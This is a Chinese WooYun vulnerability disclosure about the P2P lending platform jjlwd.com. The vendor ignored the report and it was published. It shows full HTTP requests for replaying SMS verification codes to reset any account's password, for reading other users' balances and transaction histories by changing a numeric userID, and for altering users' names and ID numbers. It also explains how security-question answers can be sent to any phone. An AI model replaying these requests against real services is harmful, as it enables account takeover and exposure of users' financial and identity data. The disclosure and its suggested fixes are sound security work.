当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187123

漏洞标题:P2P金融安全之京金联某处密码重置等多个设计缺陷

相关厂商:jjlwd.com

漏洞作者: 路人甲

提交时间:2016-03-20 23:22

修复时间:2016-03-25 23:30

公开时间:2016-03-25 23:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-20: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

打包了

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.jjl
更新时间:2016.3.17 版本1.0.2
下载安装APP
1.密码重置
先利用注册功能,给自己手机发送验证码

QQ截图20160319115910.png


记下接口返回体内容,跟手机验证码
例如

QQ截图20160319120056.png


randomCode:kGAMCEZ0UFw= 对应验证码:784204
重置13333333333,发送验证码并输入信息后提交,获得一个接口

QQ截图20160320205405.png


利用以上俩个信息,拼接该接口

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 155
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAAFLlt1sUHwgAzuXkesMh7BsNROmw
User-Agent: okhttp/2.1.0
sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=我们的验证码&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=我们的randomCode&new_passwd=123123&mobile=13333333333


提交结果

QQ截图20160319121249.png


修改成功

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 199
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=784204&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=kGAMCEZ0UFw%3D&new_passwd=123123&mobile=13333333333


可保存该接口,以便下次利用,就无需发送验证码(ps:审核可直接复制该接口内容进行密码重置)
2.信息泄露
登陆(token是没有用地,会话是没有地,uid是数字地,越权走一波)
查询账号资金信息接口,可越权查看账户资金(可发现土豪账户)

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 118
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
userID=11888&functionType=40&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d


QQ截图20160320210346.png


查询历史收益接口,可越权

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 145
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
userID=11888&functionType=10&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d&page_count=10&page_index=1


QQ截图20160320210528.png


QQ截图20160320210536.png


查询收支明细记录,可越权

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 213
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
functionType=41&userID=11888&token=ECB1F97F4D805FE25e67ff2d&page_index=1&page_count=1000&startTime=2016-03-01+00%3A00%3A00&endTime=2016-03-31+23%3A59%3A59&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29


QQ截图20160320210732.png


3.个人资料修改
APP还有个功能
个人资料表更

QQ截图20160320210819.png


未验证之前的姓名和身份证,仅通过验证码正确与否来确定是否修改个人资料,然后通过跟重置密码一样的手段,可直接绕过验证码,更换个人资料.
例如
修改的接口

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 262
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAACQyGS1J7AwAlQ+I3bDjJoCyaq8V
User-Agent: okhttp/2.1.0
sms_key=kGAMCEZ0UFw%3D&verification_code=784204&realName=%E4%BB%80%E4%B9%88%E9%AC%BC&userID=11888&functionType=13&key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&idNo=513228198401237858&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d


同样换掉验证码跟randCOde即可

QQ截图20160320212041.png


在登陆时,服务器会返回用户的身份证号跟姓名
修改前:

QQ截图20160320211838.png


修改后:

QQ截图20160320211538.png


还有个重磅消息,这接口同样是有个uid的,同样存在越权操作,so,如果一放进burp跑一波,炸了(不敢试)
4.官网获取密保答案,可修改密保答案
再说个官网的缺陷
官网登陆

QQ截图20160320212722.png


忘记密保问题的答案这一功能,可将答案发送给任意手机号

QQ截图20160320212826.png


点击【忘记密保?发送到手机】后抓包,修改手机号

QQ截图20160320212940.png


查看自己的手机短信,

QQ截图20160320213058.png


输入问题答案即可,通过密保问题。

QQ截图20160320213213.png


漏洞证明:

如上

修复方案:

加强验证,修复越权。
验证码不返回。
验证码跟手机号绑定。
账户跟手机号绑定。
必须给个20R对不

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-25 23:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价